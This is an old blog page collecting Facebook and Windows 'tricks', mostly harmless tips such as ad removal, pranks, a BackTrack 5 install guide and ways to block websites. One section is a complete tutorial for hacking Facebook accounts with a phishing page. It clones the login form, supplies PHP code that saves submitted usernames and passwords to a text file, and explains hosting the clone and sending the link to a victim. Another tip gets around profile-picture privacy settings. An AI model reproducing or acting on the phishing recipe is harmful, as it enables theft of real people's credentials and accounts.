Social Icons


Thursday, 27 February 2014

Remove Facebook Advertisements:

Using this Greasemoney script-Facebook:Cleaner you can easily remove annoying Facebook Ads.

Facebook Ghost Profile Prank:

This is the best prank ever that I played on my friends. Ask your friends to check this [ GOST PROFILE ] . It will look like a scary ghost profile.But that's not the interesting part here, Ask your friend to click on photos. 
Here come the scary part, Out  of nowhere a ghost face comes out from the centre with a scary shout.
Your Friends shouts-Our prank rocks.
When I tried this prank on my friends few girls even shouted in fear.

Post your Status in All Facebook Groups in a Single Click:

Some times you want to post your status or write message in all groups.If you do the job manually then its a time consuming frustrating process and you end up in posting your status only in few groups.But now your job has become very easy.There is a facebook application using which you can post your Facebook status in any number of groups you wish.
  Using Multiple Post Application you can make your job easy to post your status in multiple groups.

Place Facebook Chat on Firefox Sidebar:

  • Open Mozilla Firefox browser and press Alt key.
  • Select bookmarks and select "show all bookmarks"
  • A box will open from that select unsorted bookmarks > organise >  new bookmark.
  • Again a box will open in that type "facebookchat" in first boxand type " " in second box .
  • Click on load this bookmark >add.
  • Now again press alt key > view > side bar > bookmarks>.
  • Then select facebook chat from the bookmarks in slide bar.
  • You are done.Now you will be able to see chat bar on the left side of your Mozilla Firefox Browser.

Download Videos From Facebook For Free:

To download videos from facebook go to[click here ]There put the Facebook Url of video and your video will be ready to download.

How to find who deleted/Unfriended you on facebook?

You can find who deleted or unfriended you on facebook using an application called who delete me[click here].This application will back up all your friends list when you sign up for the first time and notifies via mail whenever there is a change in your friends list.

Trick to publish empty status:

Login to your facebook account.Then click on update status and enter the following code and hit enter.
  @[2:2: ]

Trick to see who is online when you are offline:

Sometimes it becomes necessary to check who is online which being offline.At such times there is a very cool Facebook Application which can make your job easy.Use the below application to know who are online while you are offline.

Create a Video With Your Pictures on Facebook:

You can easily create a video with your Facebook Pictures.To create a video with your facebook photos go to[click here].

Send SMS from Facebook:

Yes you are right now you can send sms from facebook.There are no country restrictions.You can send sms to any country.The message sending is instant and takes only few seconds to reach the destination.All this is possible with a cool facebook application.

  • Select your country.
  • Then in the next line enter the mobile number to which you want to send sms.
  • After that enter your message that you want to deliver.

  • You can send only sms upto 100 characters long.
  • You can only send 4 SMS per day.
  • Dont do any illegal things with this service as it will first display your name at the beginning of the message.

Watch Streaming TV Live on Facebook:

There is a Facebook Application that provides free streaming live TV channels on Facebook.You can watch a lot of International Channels using this Application.I am able to watch live channels without buffering on my 2G connection.This application is totally at free of cost.2012 Olympics are also broadcasted on this channel.
  Application Used:

An Easy way to view Private Facebook Profile Picture in Full size:

Some people on Facebook set their image privacy settings to "Only me".We will not be able to see their images in full size.Here is a simple work around technique using which you can see image in full size.
  • Go to the Timeline of the person.
  • Right click on the profile pick and choose the option open image in new tab from menu.
  • Then the image will open in a separate window.
  • Now just remove s160X160 from the url of the screenshot and hit enter.
  • Now you will be able to see the image in full size.
FB larger+image

Edit Facebook Login Page with Browser Hack:

  • Go to, the usual facebook login page.
  • Now, clear the address bar. Copy the code below and paste it in your address bar.
  javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

  • Make sure that javascript: is present at the beginning of the code or else this trick doesn't work.Then hit Enter.
  • Once you have completed above step, you can easily edit all the contents of the Facebook login page.
  Eg. Select any text and hit on Backspace. The text will be deleted.

In this way, you can easily add your name to the Facebook page.

Backtrack 5 on windows 7 Just 12 Step
Stage 1

1 : backtrack ISO

2 : VMware Workstation or VMplayer
3 : Install any of above

Stage 2


1 : Create A new virtual machine

                      [Image: vor1gntviid98f5bo6ay.png]
2 : choose installer ISO ( choose backtrack 5 ISO )

[Image: snc61smztupo1oe9dq37.png]

3 : choose Linux as your guest operating system type and Ubuntu as version

                     [Image: g1uovi9c4p59p72cxh9.png]
4 : give a name and location of your backtrack VM

                        [Image: eruiiyg0xyb1fo1kg2hv.png]

5 : Specify virtual hard drive space ( 20 GB is good enough )

                         [Image: zagyvyzjlce7rym91op0.png]

6. then click finish from ready to create vm window

                          [Image: 8eq1dvyknlxyez8eat9k.png]

7.hit enter to go boot screen then choose default boot text mode and hit enter

[Image: qtj42x7hwdmsccm29uf.png]


[Image: g1f61ykj4k6p8hq7je88.png]

9.type startx to start GUI ( x server )
click on Install backtrack icon or open terminal type sh -c “ubiquity”

[Image: zjsmfuc5q990qdia9wd.png]

10.and continue like normal installation choose keyboard type and provide location info
if you are installing just backtrack then go normally and erase and use entire disk or if you installing backtrack with other OS then specify partition accordingly ( in this tutorial m using virtual hard-drive )

[Image: beu11kpi76cgc3zslwk.png] on forward and click on install

[Image: epwohhgbxdpl9fb500v.png]

12. wait until it finish installing it will take up-to 30 minutes depend on your system

[Image: d14rye1420fnfyv0hozs.png]

N thats it let restart your VM n enjoy BacktraCk --5

How to Hack Facebook Account with Phishing Page


Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

Steps to create a phishing page:

1.       Go to the Facebook page ,and then right click on the page, u will see the option view source                 page,click on that.

2.      Now a new tab will open which contain a source code,Select all the stuff and paste it in a                     notepad.
3.      Now open the notepad and press CTRL+F,and type ACTION.

4.       You will have to find a text which looks like ..

5.        delete all the text written in red colour and instead of it write post.php.then it will look like...


6.       Now save it on your desktop with the name index.htm,not index.html,remember.

7.       Now your phishing page is will look like a pic given below .


8.        Open a new notepad and save the given data with the name post.php.

header ('Location:');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

9.         You have two files now one is index.htm and another is post.php,remember file extension is                 important.

10.       Now u have to upload it in a web hosting site ,i prefer u to use or else  

11.      I prefer u to use 000webhost because it will be easy to use.

12.          You have to make a account in that ,after that it looks like a picture given below.

13.      Now go control panel, then on file manager.

14.     After that a new window will pop up.Now go to public_html.

15.       Delete the file named default.php,after that upload two files index.htm and post.php one by one.

16.        Now the last step click on view of index.htm it will look same as facebook page.

This is your Facebook phishing page.

17.          Copy the url of that page and send this link to your victim,when your victim try to login in to                it with the username and password .the page redirectly connect to facebook. and you will be                now able to see his password.

18.          Open your 000webhost account and go to file manager then public_html,here you find a new               file named username.txt.

19.       Click on view now u will have your friend's password and email id.

20.        This is a simple trick to hack any Facebook password account by phishing page.

21.         If you are not able to create a phishing page then i will provide u a video tutorial link,look
              in to the description of that video u will find a prepared module of phishing pages,download
              it and enjoy.

How to Send Self-Destructing Messages

Many times there is the need of sending a written data to a person but you do not want him/her to keep that data for further reading or as a record. So, i will be telling you how can you send the self-destructing messages. After reading the message, it will not be availabe again for reading.

Follow these steps :

1. Go to the

2. Write the message you want to send.

3. If you want to get the notification when the note was read, you can mark and enter your email id for notification.

4. Then click on Create note.

5. Now it will give you a linkSend this link to the person by email.

6. The note will self-destruct after being read.

How to Make Multiple Facebook Accounts With Single e-mail Address

Facebook does not allow to make multiple accounts with same e-mail address but  with this simple trick you can easily make multiple Facebook account with the same email address. It is possible with a simple Gmail trick.


There is a small bug in Gmail because of which it ignores the dot (.) in the e-mail address and hence the following email addresses are same : so on

It can be done on all email Id's. And the facebook considers these dots (.) in the email ID and hence consider's these to be Different ID's.

So, If you want to create a new facebook account with existing ID then just place the dot (.) in the ID name while signing up.

How to (Methods) Block Specific Websites on your PC

There are some times when you want to keep away some people from using some specific or any websites or even specific category of websites. You can be a boss wanting to stop the office workers from misusing the company internet, or you can be a parent wanting to keep your children away from strangers or the internet hounds waiting ot there and also to keep your children away from porn sites or explicit contents. So, the only way is to block them. There are many methods to block the specific sites. All the methods will be explained to you in this post.

METHOD 1 - Blocking Websites on Internet Explorer
1. Open Internet Explorer.
2. Go to Tools ->> Internet Options ->>Contents.
3. Under the content Advisor, Click on settings (To activate settings tab Enable Content Advisor if it is disabled).
4. Go to Approved Sites tab,type *SITENAMES* and click on Never
5. Set up your password as prompted by Internet Explorer. 
6. Now in the General tab of content advisor settings make sure to select "Users can see websites that have no ratings".
7. And its done! Now, whenever you open the locked website you will be prompted to enter password.

[Note: This is not really a great method because of the following flaws-
1. It only works on Internet Explorer 8 or Higher.
2. User can use other browsers to open it and IE is the less preferred browser anyway.
3. Content advisor password can also be removed if the other user knows how to do it. (Click here to know how to remove Content advisor password in IE)]

METHOD 2 - Blocking Websites in host file

1. Go to My Computer -> os (c:) -> Windows -> System32 -> Drivers -> etc.
2. Right click on Hosts file and open it with notepad.
3. Now, take a look at localhost and copy paste the IP address and name underneath it like the below

4. And make sure to change the last number of IP address as you increase number of sites (look at above picture).
5. Save the file and restart your computer and its done.

METHOD 3 - Blocking Websites on the Internet Router

This method varies from router to router and is not even present in some of the routers. Hence, there is no specific method to do the same. But still i will tell you the way to do it as close i can.

1. Go to your Router Set-up page.
2. Find the Security (WAN) tab or option somewhere and try to find some option to block website with IP address or specific keywords.
3. Put these IP addresses of the sites you want to block in the given field .
4. Save the settings and its done.

METHOD 4 - Blocking Websites with Parental Control

Since this is not a built in feature in windows you need to download Windows live family safety from the internet.

2. Install it and be sure to check the family safety box during installation.
3. Go to Control Panel -> Parental Control.
4. Select the windows user you want to block and go to windows live family safety (You may have to enter your windows live ID and password).

5. Now, go to web filtering list and put in the address of the site you want to block in the address bar and click on block.
7. You can make a list of sites like this.
6. Hence, specific web addresses are blocked for the specific user.

METHOD 5 - Blocking Websites using Third Party Applications

Here are some of the applications to block selected websites. Just download and install one of these and follow the required instructions by the software

-->> HT Parent Control for Home

-->> HT Employee Control for Office

There are many other softwares on the internet to block the websites but these are the best softwares of the lot.
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